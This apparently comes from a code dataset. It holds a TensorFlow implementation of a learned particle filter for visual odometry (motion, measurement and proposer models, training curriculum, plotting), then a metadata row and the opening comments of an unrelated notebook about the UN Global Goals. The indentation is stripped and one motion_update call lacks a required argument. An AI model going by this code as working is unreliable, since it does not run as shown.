outputs = tf.nn.relu(outputs)
outputs = tf.nn.dropout(outputs, self.placeholders['keep_prob'])
outputs = snt.BatchFlatten()(outputs)
outputs = snt.Linear(128)(outputs)
outputs = tf.nn.relu(outputs)
return outputs
def measurement_update(self, encoding, particles, means, stds):
"""
Compute the likelihood of the encoded observation for each particle.
:param encoding: encoding of the observation
:param particles:
:param means:
:param stds:
:return: observation likelihood
"""
# prepare input (normalize particles poses and repeat encoding per particle)
particle_input = self.transform_particles_as_input(particles, means, stds)
encoding_input = tf.tile(encoding[:, tf.newaxis, :], [1, tf.shape(particles)[1], 1])
input = tf.concat([encoding_input, particle_input], axis=-1)
# estimate the likelihood of the encoded observation for each particle, remove last dimension
obs_likelihood = snt.BatchApply(self.obs_like_estimator)(input)[:, :, 0]
return obs_likelihood
def transform_particles_as_input(self, particles, means, stds):
return ((particles - means['s']) / stds['s'])[..., 3:5]
def propose_particles(self, encoding, num_particles, state_mins, state_maxs):
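        # Map the proposer's tanh outputs onto the state space: x/y are rescaled into [state_min, state_max]
        # and the heading is recovered from the last two outputs via atan2.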
duplicated_encoding = tf.tile(encoding[:, tf.newaxis, :], [1, num_particles, 1])
proposed_particles = snt.BatchApply(self.particle_proposer)(duplicated_encoding)
proposed_particles = tf.concat([
proposed_particles[:,:,:1] * (state_maxs[0] - state_mins[0]) / 2.0 + (state_maxs[0] + state_mins[0]) / 2.0,
proposed_particles[:,:,1:2] * (state_maxs[1] - state_mins[1]) / 2.0 + (state_maxs[1] + state_mins[1]) / 2.0,
atan2(proposed_particles[:,:,2:3], proposed_particles[:,:,3:4])], axis=2)
return proposed_particles
def motion_update(self, actions, particles, means, stds, state_step_sizes, learn_gaussian_mle, stop_sampling_gradient=False):
"""
Move particles according to odometry info in actions. Add learned noise.
:param actions:
:param particles:
:param means:
:param stds:
:param state_step_sizes:
:param stop_sampling_gradient:
:return: moved particles
"""
# 1. SAMPLE NOISY ACTIONS
# add dimension for particles
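        # KITTI sequences are recorded at roughly 10 Hz, so ~0.103 s elapses between consecutive frames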
time_step = 0.103
if learn_gaussian_mle:
actions = tf.concat([particles[:, :, 3:4] - means['s'][:, :, 3:4], particles[:, :, 4:5] - means['s'][:, :, 4:5]], axis=-1)
# prepare input (normalize actions and repeat per particle)
action_input = actions / stds['s'][:, :, 3:5]
input = action_input
# estimate action noise
delta = snt.BatchApply(self.mo_noise_generator)(input)
delta = tf.concat([delta[:, :, 0:2] * state_step_sizes[3], delta[:, :, 2:4] * state_step_sizes[4]], axis=-1)
if stop_sampling_gradient:
delta = tf.stop_gradient(delta)
action_vel_f = tf.random_normal(tf.shape(particles[:, :, 3:4]), mean = delta[:, :, 0:1], stddev = delta[:, :, 1:2])
action_vel_rot = tf.random_normal(tf.shape(particles[:, :, 4:5]), mean = delta[:, :, 2:3], stddev = delta[:, :, 3:4])
heading = particles[:, :, 2:3]
sin_heading = tf.sin(heading)
cos_heading = tf.cos(heading)
new_x = particles[:, :, 0:1] + cos_heading * particles[:, :, 3:4] * time_step
new_y = particles[:, :, 1:2] + sin_heading * particles[:, :, 3:4] * time_step
new_theta = particles[:, :, 2:3] + particles[:, :, 4:5] * time_step
            new_theta = wrap_angle(new_theta)
new_v = particles[:, :, 3:4] + action_vel_f
new_theta_dot = particles[:, :, 4:5] + action_vel_rot
moved_particles = tf.concat([new_x, new_y, new_theta, new_v, new_theta_dot], axis=-1)
return moved_particles, delta
else:
heading = particles[:, :, 2:3]
sin_heading = tf.sin(heading)
cos_heading = tf.cos(heading)
random_input = tf.random_normal(tf.shape(particles[:, :, 3:5]))
noise = snt.BatchApply(self.mo_noise_generator)(random_input)
noise = noise - tf.reduce_mean(noise, axis=1, keep_dims=True)
new_z = particles[:, :, 0:1] + cos_heading * particles[:, :, 3:4] * time_step
new_x = particles[:, :, 1:2] + sin_heading * particles[:, :, 3:4] * time_step
new_theta = wrap_angle(particles[:, :, 2:3] + particles[:, :, 4:5] * time_step)
new_v = particles[:, :, 3:4] + noise[:, :, :1] * state_step_sizes[3]
new_theta_dot = particles[:, :, 4:5] + noise[:, :, 1:] * state_step_sizes[4]
moved_particles = tf.concat([new_z, new_x, new_theta, new_v, new_theta_dot], axis=-1)
return moved_particles
def compile_training_stages(self, sess, batch_iterators, particle_list, particle_probs_list, encodings, means, stds, state_step_sizes, state_mins, state_maxs, learn_gaussian_mle, learning_rate, plot_task):
# TRAINING!
losses = dict()
train_stages = dict()
std = 0.25
# TRAIN ODOMETRY
if self.learn_odom:
# apply model
motion_samples = self.motion_update(self.placeholders['a'][:,0],
self.placeholders['s'][:, :1],
means, stds, state_step_sizes,
stop_sampling_gradient=True)
# define loss and optimizer
sq_distance = compute_sq_distance(motion_samples, self.placeholders['s'][:, 1:2], state_step_sizes)
losses['motion_mse'] = tf.reduce_mean(sq_distance, name='loss')
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# put everything together
train_stages['train_odom'] = {
'train_op': optimizer.minimize(losses['motion_mse']),
'batch_iterator_names': {'train': 'train1', 'val': 'val1'},
'monitor_losses': ['motion_mse'],
'validation_loss': 'motion_mse',
'plot': lambda e: self.plot_motion_model(sess, next(batch_iterators['val2']), motion_samples, plot_task, state_step_sizes) if e % 1 == 0 else None
}
# TRAIN MOTION MODEL
if learn_gaussian_mle:
motion_samples, motion_params = self.motion_update(self.placeholders['a'][:,1],
tf.tile(self.placeholders['s'][:, :1], [1, 1, 1]),
means, stds, state_step_sizes, learn_gaussian_mle)
# define loss and optimizer
diff_in_states = self.placeholders['s'][:, 1:2] - self.placeholders['s'][:, :1]
activations_vel_f = (1 / 32) / tf.sqrt(2 * np.pi * motion_params[:, :, 1] ** 2) * tf.exp(
-(diff_in_states[:, :, 3] - motion_params[:, :, 0]) ** 2 / (2.0 * motion_params[:, :, 1] ** 2))
activations_vel_rot = (1 / 32) / tf.sqrt(2 * np.pi * motion_params[:, :, 3] ** 2) * tf.exp(
-(diff_in_states[:, :, 4] - motion_params[:, :, 2]) ** 2 / (2.0 * motion_params[:, :, 3] ** 2))
losses['motion_mle'] = tf.reduce_mean(-tf.log(1e-16 + (tf.reduce_sum(activations_vel_f, axis=-1, name='loss1') * tf.reduce_sum(activations_vel_rot, axis=-1, name='loss2'))))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# put everything together
train_stages['train_motion_sampling'] = {
'train_op': optimizer.minimize(losses['motion_mle']),
'batch_iterator_names': {'train': 'train2', 'val': 'val2'},
'monitor_losses': ['motion_mle'],
'validation_loss': 'motion_mle',
'plot': lambda e: self.plot_motion_model(sess, next(batch_iterators['val2']), motion_samples, plot_task, state_step_sizes) if e % 1 == 0 else None
}
else:
motion_samples = self.motion_update(self.placeholders['a'][:,1],
tf.tile(self.placeholders['s'][:, :1], [1, self.num_particles, 1]),
means, stds, state_step_sizes, learn_gaussian_mle)
# define loss and optimizer
sq_distance = compute_sq_distance(motion_samples, self.placeholders['s'][:, 1:2], state_step_sizes)
activations_sample = (1 / self.num_particles_float) / tf.sqrt(2 * np.pi * std ** 2) * tf.exp(
-sq_distance / (2.0 * std ** 2))
losses['motion_mle'] = tf.reduce_mean(-tf.log(1e-16 + tf.reduce_sum(activations_sample, axis=-1, name='loss')))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# put everything together
train_stages['train_motion_sampling'] = {
'train_op': optimizer.minimize(losses['motion_mle']),
'batch_iterator_names': {'train': 'train2', 'val': 'val2'},
'monitor_losses': ['motion_mle'],
'validation_loss': 'motion_mle',
'plot': lambda e: self.plot_motion_model(sess, next(batch_iterators['val2']), motion_samples, plot_task, state_step_sizes) if e % 1 == 0 else None
}
# TRAIN MEASUREMENT MODEL
# apply model for all pairs of observations and states in that batch
test_particles = tf.tile(self.placeholders['s'][tf.newaxis, :, 0], [self.batch_size, 1, 1])
measurement_model_out = self.measurement_update(encodings[:, 0], test_particles, means, stds)
# define loss (correct -> 1, incorrect -> 0) and optimizer
correct_samples = tf.diag_part(measurement_model_out)
incorrect_samples = measurement_model_out - tf.diag(tf.diag_part(measurement_model_out))
losses['measurement_heuristic'] = tf.reduce_sum(-tf.log(correct_samples)) / tf.cast(self.batch_size, tf.float32) \
+ tf.reduce_sum(-tf.log(1.0 - incorrect_samples)) / tf.cast(self.batch_size * (self.batch_size - 1), tf.float32)
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# put everything together
train_stages['train_measurement_model'] = {
'train_op': optimizer.minimize(losses['measurement_heuristic']),
'batch_iterator_names': {'train': 'train1', 'val': 'val1'},
'monitor_losses': ['measurement_heuristic'],
'validation_loss': 'measurement_heuristic',
'plot': lambda e: self.plot_measurement_model(sess, batch_iterators['val1'], measurement_model_out) if e % 1 == 0 else None
}
# TRAIN PARTICLE PROPOSER
if self.use_proposer:
# apply model (but only compute gradients until the encoding,
# otherwise we would unlearn it and the observation likelihood wouldn't work anymore)
proposed_particles = self.propose_particles(tf.stop_gradient(encodings[:, 0]), self.num_particles, state_mins, state_maxs)
# define loss and optimizer
std = 0.2
sq_distance = compute_sq_distance(proposed_particles, self.placeholders['s'][:, :1], state_step_sizes)
activations = (1 / self.num_particles_float) / tf.sqrt(2 * np.pi * std ** 2) * tf.exp(
-sq_distance / (2.0 * std ** 2))
losses['proposed_mle'] = tf.reduce_mean(-tf.log(1e-16 + tf.reduce_sum(activations, axis=-1)))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# put everything together
train_stages['train_particle_proposer'] = {
'train_op': optimizer.minimize(losses['proposed_mle']),
'batch_iterator_names': {'train': 'train1', 'val': 'val1'},
'monitor_losses': ['proposed_mle'],
'validation_loss': 'proposed_mle',
'plot': lambda e: self.plot_particle_proposer(sess, next(batch_iterators['val1']), proposed_particles, plot_task) if e % 10 == 0 else None
}
# END-TO-END TRAINING
# model was already applied further up -> particle_list, particle_probs_list
# define losses and optimizer
# first loss (which is being optimized)
sq_distance = compute_sq_distance(particle_list[:, :, :, 3:5], self.placeholders['s'][:, :, tf.newaxis, 3:5], state_step_sizes[3:5])
activations = particle_probs_list[:, :] / tf.sqrt(2 * np.pi * self.particle_std ** 2) * tf.exp(
-sq_distance / (2.0 * self.particle_std ** 2))
losses['mle'] = tf.reduce_mean(-tf.log(1e-16 + tf.reduce_sum(activations, axis=2, name='loss')))
# second loss (which we will monitor during execution)
pred = self.particles_to_state(particle_list, particle_probs_list)
sq_error = compute_sq_distance(pred[:, -1, 0:2], self.placeholders['s'][:, -1, 0:2], [1., 1.])
sq_dist = compute_sq_distance(self.placeholders['s'][:, 0, 0:2], self.placeholders['s'][:, -1, 0:2], [1., 1.])
losses['m/m'] = tf.reduce_mean(sq_error**0.5/sq_dist**0.5)
sq_error = compute_sq_distance(pred[:, -1, 2:3], self.placeholders['s'][:, -1, 2:3], [np.pi/180.0])
losses['deg/m'] = tf.reduce_mean(sq_error ** 0.5 / sq_dist ** 0.5)
# optimizer
optimizer = tf.train.AdamOptimizer(learning_rate)
# put everything together
train_stages['train_e2e'] = {
'train_op': optimizer.minimize(losses['mle']),
'batch_iterator_names': {'train': 'train', 'val': 'val'},
'monitor_losses': ['m/m', 'deg/m', 'mle'],
'validation_loss': 'deg/m',
'plot': lambda e: self.plot_particle_filter(sess, next(batch_iterators['val_ex']), particle_list,
particle_probs_list, state_step_sizes, plot_task) if e % 1 == 0 else None
}
return losses, train_stages
def load(self, sess, model_path, model_file='best_validation', statistics_file='statistics.npz', connect_and_initialize=True, modules=('encoder', 'mo_noise_generator', 'mo_transition_model', 'obs_like_estimator', 'particle_proposer')):
if type(modules) not in [type(list()), type(tuple())]:
raise Exception('modules must be a list or tuple, not a ' + str(type(modules)))
# build the tensorflow graph
if connect_and_initialize:
# load training data statistics (which are needed to build the tf graph)
statistics = dict(np.load(os.path.join(model_path, statistics_file)))
for key in statistics.keys():
if statistics[key].shape == ():
statistics[key] = statistics[key].item() # convert 0d array of dictionary back to a normal dictionary
# connect all modules into the particle filter
self.connect_modules(**statistics)
init = tf.global_variables_initializer()
sess.run(init)
# load variables
all_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
vars_to_load = []
loaded_modules = set()
for v in all_vars:
for m in modules:
if m in v.name:
vars_to_load.append(v)
loaded_modules.add(m)
print('Loading all modules')
saver = tf.train.Saver()
saver.restore(sess, os.path.join(model_path, model_file))
# def fit(self, sess, data, model_path, train_individually, train_e2e, split_ratio, seq_len, batch_size, epoch_length, num_epochs, patience, learning_rate, dropout_keep_ratio, num_particles, particle_std, plot_task=None, plot=False):
def fit(self, sess, data, model_path, train_individually, train_e2e, split_ratio, seq_len, batch_size, epoch_length, num_epochs, patience, learning_rate, dropout_keep_ratio, num_particles, particle_std, learn_gaussian_mle, plot_task=None, plot=False):
if plot:
plt.ion()
self.particle_std = particle_std
mean_loss_for_plot = np.zeros((1,))
means, stds, state_step_sizes, state_mins, state_maxs = compute_statistics(data)
data = split_data(data, ratio=split_ratio)
epoch_lengths = {'train': epoch_length, 'val': epoch_length*2}
batch_iterators = {'train': make_batch_iterator(data['train'], seq_len=seq_len, batch_size=batch_size),
'val': make_repeating_batch_iterator(data['val'], epoch_lengths['val'], batch_size=batch_size, seq_len=seq_len),
'train_ex': make_batch_iterator(data['train'], batch_size=batch_size, seq_len=seq_len),
'val_ex': make_batch_iterator(data['val'], batch_size=batch_size, seq_len=seq_len),
'train1': make_batch_iterator(data['train'], batch_size=batch_size, seq_len=1),
'train2': make_batch_iterator(data['train'], batch_size=batch_size, seq_len=2),
'val1': make_repeating_batch_iterator(data['val'], epoch_lengths['val'], batch_size=batch_size, seq_len=1),
'val2': make_repeating_batch_iterator(data['val'], epoch_lengths['val'], batch_size=batch_size, seq_len=2),
}
# build the tensorflow graph by connecting all modules in the particles filter
particles, particle_probs, encodings, particle_list, particle_probs_list = self.connect_modules(means, stds, state_mins, state_maxs, state_step_sizes, learn_gaussian_mle)
# define losses and train stages for different ways of training (e.g. training individual models and e2e training)
losses, train_stages = self.compile_training_stages(sess, batch_iterators, particle_list, particle_probs_list,
encodings, means, stds, state_step_sizes, state_mins,
state_maxs, learn_gaussian_mle, learning_rate, plot_task)
# initialize variables
init = tf.global_variables_initializer()
sess.run(init)
# save statistics and prepare saving variables
if not os.path.exists(model_path):
os.makedirs(model_path)
np.savez(os.path.join(model_path, 'statistics'), means=means, stds=stds, state_step_sizes=state_step_sizes,
state_mins=state_mins, state_maxs=state_maxs)
saver = tf.train.Saver()
save_path = os.path.join(model_path, 'best_validation')
# define the training curriculum
curriculum = []
if train_individually:
if self.learn_odom:
curriculum += ['train_odom']
curriculum += ['train_measurement_model']
curriculum += ['train_motion_sampling']
if self.use_proposer:
curriculum += ['train_particle_proposer']
if train_e2e:
curriculum += ['train_e2e']
# split data for early stopping
data_keys = ['train']
if split_ratio < 1.0:
data_keys.append('val')
# define log dict
log = {c: {dk: {lk: {'mean': [], 'se': []} for lk in train_stages[c]['monitor_losses']} for dk in data_keys} for c in curriculum}
# go through curriculum
for c in curriculum:
stage = train_stages[c]
best_val_loss = np.inf
best_epoch = 0
epoch = 0
if c == 'train_e2e':
saver.save(sess, os.path.join(model_path, 'before_e2e/best_validation'))
np.savez(os.path.join(model_path, 'before_e2e/statistics'), means=means, stds=stds, state_step_sizes=state_step_sizes,
state_mins=state_mins, state_maxs=state_maxs)
while epoch < num_epochs and epoch - best_epoch < patience:
# training
for dk in data_keys:
# don't train in the first epoch, just evaluate the initial parameters
if dk == 'train' and epoch == 0:
continue
# set up loss lists which will be filled during the epoch
loss_lists = {lk: [] for lk in stage['monitor_losses']}
for e in range(epoch_lengths[dk]):
# t0 = time.time()
# pick a batch from the right iterator
batch = next(batch_iterators[stage['batch_iterator_names'][dk]])
# define the inputs and train/run the model
input_dict = {**{self.placeholders[key]: batch[key] for key in 'osa'},
**{self.placeholders['num_particles']: num_particles},
}
if dk == 'train':
input_dict[self.placeholders['keep_prob']] = dropout_keep_ratio
input_dict[self.placeholders['is_training']] = True
monitor_losses = {l: losses[l] for l in stage['monitor_losses']}
if dk == 'train':
s_losses, _ = sess.run([monitor_losses, stage['train_op']], input_dict)
else:
s_losses = sess.run(monitor_losses, input_dict)
for lk in stage['monitor_losses']:
loss_lists[lk].append(s_losses[lk])
# after each epoch, compute and log statistics
for lk in stage['monitor_losses']:
log[c][dk][lk]['mean'].append(np.mean(loss_lists[lk]))
log[c][dk][lk]['se'].append(np.std(loss_lists[lk], ddof=1) / np.sqrt(len(loss_lists[lk])))
# check whether the current model is better than all previous models
if 'val' in data_keys:
current_val_loss = log[c]['val'][stage['validation_loss']]['mean'][-1]
mean_loss_for_plot = np.append(mean_loss_for_plot,current_val_loss)
if current_val_loss < best_val_loss:
best_val_loss = current_val_loss
best_epoch = epoch
# save current model
saver.save(sess, save_path)
txt = 'epoch {:>3} >> '.format(epoch)
else:
txt = 'epoch {:>3} == '.format(epoch)
else:
best_epoch = epoch
saver.save(sess, save_path)
txt = 'epoch {:>3} >> '.format(epoch)
# after going through all data sets, do a print out of the current result
for lk in stage['monitor_losses']:
txt += '{}: '.format(lk)
for dk in data_keys:
if len(log[c][dk][lk]['mean']) > 0:
txt += '{:.2f}+-{:.2f}/'.format(log[c][dk][lk]['mean'][-1], log[c][dk][lk]['se'][-1])
txt = txt[:-1] + ' -- '
print(txt)
if plot:
stage['plot'](epoch)
epoch += 1
# after running out of patience, restore the model with lowest validation loss
saver.restore(sess, save_path)
return log
def predict(self, sess, batch, return_particles=False, **kwargs):
# define input dict, use the first state only if we do tracking
input_dict = {self.placeholders['o']: batch['o'],
self.placeholders['a']: batch['a'],
self.placeholders['num_particles']: 100}
if self.init_with_true_state:
input_dict[self.placeholders['s']] = batch['s'][:, :1]
if return_particles:
return sess.run([self.pred_states, self.particle_list, self.particle_probs_list], input_dict)
else:
return sess.run(self.pred_states, input_dict)
def connect_modules(self, means, stds, state_mins, state_maxs, state_step_sizes, learn_gaussian_mle=False):
# get shapes
self.batch_size = tf.shape(self.placeholders['o'])[0]
self.seq_len = tf.shape(self.placeholders['o'])[1]
# we use the static shape here because we need it to build the graph
self.action_dim = self.placeholders['a'].get_shape()[-1].value
encodings = snt.BatchApply(self.encoder)((self.placeholders['o'] - means['o']) / stds['o'])
# initialize particles
if self.init_with_true_state:
# tracking with known initial state
initial_particles = tf.tile(self.placeholders['s'][:, 0, tf.newaxis, :], [1, self.num_particles, 1])
else:
# global localization
if self.use_proposer:
# propose particles from observations
initial_particles = self.propose_particles(encodings[:, 0], self.num_particles, state_mins, state_maxs)
else:
# sample particles randomly
initial_particles = tf.concat(
[tf.random_uniform([self.batch_size, self.num_particles, 1], state_mins[d], state_maxs[d]) for d in
range(self.state_dim)], axis=-1, name='particles')
initial_particle_probs = tf.ones([self.batch_size, self.num_particles],
name='particle_probs') / self.num_particles_float
# assumes that samples has the correct size
def permute_batch(x, samples):
# get shapes
batch_size = tf.shape(x)[0]
num_particles = tf.shape(x)[1]
sample_size = tf.shape(samples)[1]
# compute 1D indices into the 2D array
idx = samples + num_particles * tf.tile(
tf.reshape(tf.range(batch_size), [batch_size, 1]),
[1, sample_size])
# index using the 1D indices and reshape again
result = tf.gather(tf.reshape(x, [batch_size * num_particles, -1]), idx)
result = tf.reshape(result, tf.shape(x[:,:sample_size]))
return result
def loop(particles, particle_probs, particle_list, particle_probs_list, additional_probs_list, i):
num_proposed_float = tf.round((self.propose_ratio ** tf.cast(i, tf.float32)) * self.num_particles_float)
num_proposed = tf.cast(num_proposed_float, tf.int32)
num_resampled_float = self.num_particles_float - num_proposed_float
num_resampled = tf.cast(num_resampled_float, tf.int32)
if self.propose_ratio < 1.0:
# resampling
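                # Systematic (low-variance) resampling: one random offset per batch element, evenly spaced
                # markers, and an argmax over the cumulative weights picks each new particle's ancestor.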
basic_markers = tf.linspace(0.0, (num_resampled_float - 1.0) / num_resampled_float, num_resampled)
random_offset = tf.random_uniform([self.batch_size], 0.0, 1.0 / num_resampled_float)
markers = random_offset[:, None] + basic_markers[None, :] # shape: batch_size x num_resampled
cum_probs = tf.cumsum(particle_probs, axis=1)
marker_matching = markers[:, :, None] < cum_probs[:, None, :] # shape: batch_size x num_resampled x num_particles
samples = tf.cast(tf.argmax(tf.cast(marker_matching, 'int32'), dimension=2), 'int32')
standard_particles = permute_batch(particles, samples)
standard_particle_probs = tf.ones([self.batch_size, num_resampled])
standard_particles = tf.stop_gradient(standard_particles)
standard_particle_probs = tf.stop_gradient(standard_particle_probs)
# motion update
if learn_gaussian_mle:
standard_particles, _ = self.motion_update(self.placeholders['a'][:, i], standard_particles, means, stds, state_step_sizes, learn_gaussian_mle)
else:
standard_particles = self.motion_update(self.placeholders['a'][:, i], standard_particles, means, stds, state_step_sizes, learn_gaussian_mle)
# measurement update
standard_particle_probs *= self.measurement_update(encodings[:, i], standard_particles, means, stds)
if self.propose_ratio > 0.0:
# proposed particles
proposed_particles = self.propose_particles(encodings[:, i], num_proposed, state_mins, state_maxs)
proposed_particle_probs = tf.ones([self.batch_size, num_proposed])
# NORMALIZE AND COMBINE PARTICLES
if self.propose_ratio == 1.0:
particles = proposed_particles
particle_probs = proposed_particle_probs
elif self.propose_ratio == 0.0:
particles = standard_particles
particle_probs = standard_particle_probs
else:
standard_particle_probs *= (num_resampled_float / self.num_particles_float) / tf.reduce_sum(standard_particle_probs, axis=1, keep_dims=True)
proposed_particle_probs *= (num_proposed_float / self.num_particles_float) / tf.reduce_sum(proposed_particle_probs, axis=1, keep_dims=True)
particles = tf.concat([standard_particles, proposed_particles], axis=1)
particle_probs = tf.concat([standard_particle_probs, proposed_particle_probs], axis=1)
# NORMALIZE PROBABILITIES
particle_probs /= tf.reduce_sum(particle_probs, axis=1, keep_dims=True)
particle_list = tf.concat([particle_list, particles[:, tf.newaxis]], axis=1)
particle_probs_list = tf.concat([particle_probs_list, particle_probs[:, tf.newaxis]], axis=1)
return particles, particle_probs, particle_list, particle_probs_list, additional_probs_list, i + 1
# reshapes and sets the first shape sizes to None (which is necessary to keep the shape consistent in while loop)
particle_list = tf.reshape(initial_particles,
shape=[self.batch_size, -1, self.num_particles, self.state_dim])
particle_probs_list = tf.reshape(initial_particle_probs, shape=[self.batch_size, -1, self.num_particles])
additional_probs_list = tf.reshape(tf.ones([self.batch_size, self.num_particles, 4]), shape=[self.batch_size, -1, self.num_particles, 4])
# run the filtering process
particles, particle_probs, particle_list, particle_probs_list, additional_probs_list, i = tf.while_loop(
lambda *x: x[-1] < self.seq_len, loop,
[initial_particles, initial_particle_probs, particle_list, particle_probs_list, additional_probs_list,
tf.constant(1, dtype='int32')], name='loop')
# compute mean of particles
self.pred_states = self.particles_to_state(particle_list, particle_probs_list)
self.particle_list = particle_list
self.particle_probs_list = particle_probs_list
return particles, particle_probs, encodings, particle_list, particle_probs_list
def particles_to_state(self, particle_list, particle_probs_list):
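        # Weighted mean over particles; orientation is averaged on the circle using weighted sine/cosine components.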
mean_position = tf.reduce_sum(particle_probs_list[:, :, :, tf.newaxis] * particle_list[:, :, :, :2], axis=2)
mean_orientation = atan2(
tf.reduce_sum(particle_probs_list[:, :, :, tf.newaxis] * tf.cos(particle_list[:, :, :, 2:3]), axis=2),
tf.reduce_sum(particle_probs_list[:, :, :, tf.newaxis] * tf.sin(particle_list[:, :, :, 2:3]), axis=2))
mean_velocity = tf.reduce_sum(particle_probs_list[:, :, :, tf.newaxis] * particle_list[:, :, :, 3:5], axis=2)
return tf.concat([mean_position, mean_orientation, mean_velocity], axis=2)
def plot_motion_model(self, sess, batch, motion_samples, task, state_step_sizes):
# define the inputs and train/run the model
input_dict = {**{self.placeholders[key]: batch[key] for key in 'osa'},
**{self.placeholders['num_particles']: 100},
}
s_motion_samples = sess.run(motion_samples, input_dict)
plt.figure('Motion Model')
plt.gca().clear()
for i in range(min(len(s_motion_samples), 10)):
plt.scatter(s_motion_samples[i, :, 3] / state_step_sizes[3], s_motion_samples[i, :, 4] / state_step_sizes[4], color='blue', s=1)
plt.scatter(batch['s'][i, 0, 3] / state_step_sizes[3], batch['s'][i, 0, 4] / state_step_sizes[4], color='black', s=1)
plt.scatter(batch['s'][i, 1, 3] / state_step_sizes[3], batch['s'][i, 1, 4] / state_step_sizes[4], color='red', s=3)
plt.plot(batch['s'][i, :2, 3] / state_step_sizes[3], batch['s'][i, :2, 4] / state_step_sizes[4], color='black')
plt.xlim([0, 200])
plt.ylim([-50, 50])
plt.xlabel('translational vel')
plt.ylabel('angular vel')
plt.gca().set_aspect('equal')
plt.pause(0.01)
def plot_measurement_model(self, sess, batch_iterator, measurement_model_out):
batch = next(batch_iterator)
# define the inputs and train/run the model
input_dict = {**{self.placeholders[key]: batch[key] for key in 'osa'},
**{self.placeholders['num_particles']: 100},
}
s_measurement_model_out = sess.run([measurement_model_out], input_dict)
plt.figure('Measurement Model Output')
plt.gca().clear()
plt.imshow(s_measurement_model_out[0], interpolation="nearest", cmap="viridis_r", vmin=0.0, vmax=1.0)
plt.figure('Measurement Model Input')
plt.clf()
plt.scatter(batch['s'][:1, 0, 3], batch['s'][:1, 0, 4], marker='x', c=s_measurement_model_out[0][0,:1], vmin=0, vmax=1.0, cmap='viridis_r')
plt.scatter(batch['s'][1:, 0, 3], batch['s'][1:, 0, 4], marker='o', c=s_measurement_model_out[0][0,1:], vmin=0, vmax=1.0, cmap='viridis_r')
plt.xlabel('x_dot')
plt.ylabel('theta_dot')
plt.pause(0.01)
def plot_particle_proposer(self, sess, batch, proposed_particles, task):
# define the inputs and train/run the model
input_dict = {**{self.placeholders[key]: batch[key] for key in 'osa'},
**{self.placeholders['num_particles']: 100},
}
s_samples = sess.run(proposed_particles, input_dict)
plt.figure('Particle Proposer')
plt.gca().clear()
plot_maze(task)
for i in range(min(len(s_samples), 10)):
color = np.random.uniform(0.0, 1.0, 3)
plt.quiver(s_samples[i, :, 0], s_samples[i, :, 1], np.cos(s_samples[i, :, 2]), np.sin(s_samples[i, :, 2]), color=color, width=0.001, scale=100)
plt.quiver(batch['s'][i, 0, 0], batch['s'][i, 0, 1], np.cos(batch['s'][i, 0, 2]), np.sin(batch['s'][i, 0, 2]), color=color, scale=50, width=0.003)
plt.pause(0.01)
def plot_particle_filter(self, sess, batch, particle_list,
particle_probs_list, state_step_sizes, task):
s_states, s_particle_list, s_particle_probs_list, \
= sess.run([self.placeholders['s'], particle_list,
particle_probs_list], #self.noise_scaler1(1.0), self.noise_scaler2(2.0)],
{**{self.placeholders[key]: batch[key] for key in 'osa'},
**{self.placeholders['num_particles']: 20},
})
# print('learned motion noise factors {:.2f}/{:.2f}'.format(n1, n2))
num_steps = s_particle_list.shape[1]
for s in range(3):
plt.figure('particle_evolution, example {}'.format(s))
plt.clf()
for d in range(5):
plt.subplot(3, 2, [1, 3, 5, 2, 4][d])
for i in range(num_steps):
plt.scatter(i * np.ones_like(s_particle_list[s, i, :, d]),
s_particle_list[s, i, :, d] / (1 if s == 0 else state_step_sizes[d]),
c=s_particle_probs_list[s, i, :], cmap='viridis_r', marker='o', s=6, alpha=0.5,
linewidths=0.05,
vmin=0.0,
vmax=0.1)
current_state = batch['s'][s, i, d] / (1 if s == 0 else state_step_sizes[d])
plt.plot([i], [current_state], 'o', markerfacecolor='None', markeredgecolor='k',
markersize=2.5)
plt.xlabel('Time')
plt.ylabel('State {}'.format(d))
show_pause(pause=0.01)
| mit | 6,549,029,999,007,857,000 | 50.16409 | 255 | 0.560738 | false | 3.742303 | false | false | false |
westurner/pyglobalgoals | notebooks/globalgoals-pyglobalgoals.py.py | 1 | 16352 |
# coding: utf-8
# # @TheGlobalGoals for Sustainable Development
# ## Background
#
# * Homepage: **http://www.globalgoals.org/**
# - Twitter: https://twitter.com/TheGlobalGoals
# - Instagram: https://instagram.com/TheGlobalGoals/
# - Facebook: https://www.facebook.com/globalgoals.org
# - YouTube: https://www.youtube.com/channel/UCRfuAYy7MesZmgOi1Ezy0ng/
# - Hashtag: **#GlobalGoals**
# - https://twitter.com/hashtag/GlobalGoals
# - https://instagram.com/explore/tags/GlobalGoals/
# - https://www.facebook.com/hashtag/GlobalGoals
# - Hashtag: #TheGlobalGoals
# - https://twitter.com/hashtag/TheGlobalGoals
# - https://instagram.com/explore/tags/TheGlobalGoals/
# - https://www.facebook.com/hashtag/TheGlobalGoals
#
#
# ### pyglobalgoals
#
# * Homepage: https://github.com/westurner/pyglobalgoals
# * Src: https://github.com/westurner/pyglobalgoals
# * Download: https://github.com/westurner/pyglobalgoals/releases
#
# ### Objectives
#
# * [x] ENH: Read and parse TheGlobalGoals from globalgoals.org
# * [x] ENH: Download (HTTP GET) each GlobalGoal tile image to ``./notebooks/data/images/``
# * [-] ENH: Generate e.g. tweets for each GlobalGoal (e.g. **##gg17** / **##GG17**)
# * [x] ENH: Save TheGlobalGoals to a JSON-LD document
# * [-] ENH: Save TheGlobalGoals with Schema.org RDF vocabulary (as JSON-LD)
# * [-] ENH: Save TheGlobalGoals as ReStructuredText with headings and images
# * [-] ENH: Save TheGlobalGoals as Markdown with headings and images
# * [-] ENH: Save TheGlobalGoals as RDFa with headings and images
# * [ ] ENH: Save TheGlobalGoals as RDFa with images like http://globalgoals.org/
# * [-] DOC: Add narrative documentation where necessary
# * [-] REF: Refactor and extract methods from ``./notebooks/`` to ``./pyglobalgoals/``
#
# ## Implementation
#
# * Python package: [**pyglobalgoals**](#pyglobalgoals)
#
# * Jupyter notebook: **``./notebooks/globalgoals-pyglobalgoals.py.ipynb``**
# * Src: https://github.com/westurner/pyglobalgoals/blob/master/notebooks/globalgoals-pyglobalgoals.py.ipynb
# * Src: https://github.com/westurner/pyglobalgoals/blob/master/notebooks/globalgoals-pyglobalgoals.py.py
# * Src: https://github.com/westurner/pyglobalgoals/blob/develop/notebooks/globalgoals-pyglobalgoals.py.ipynb
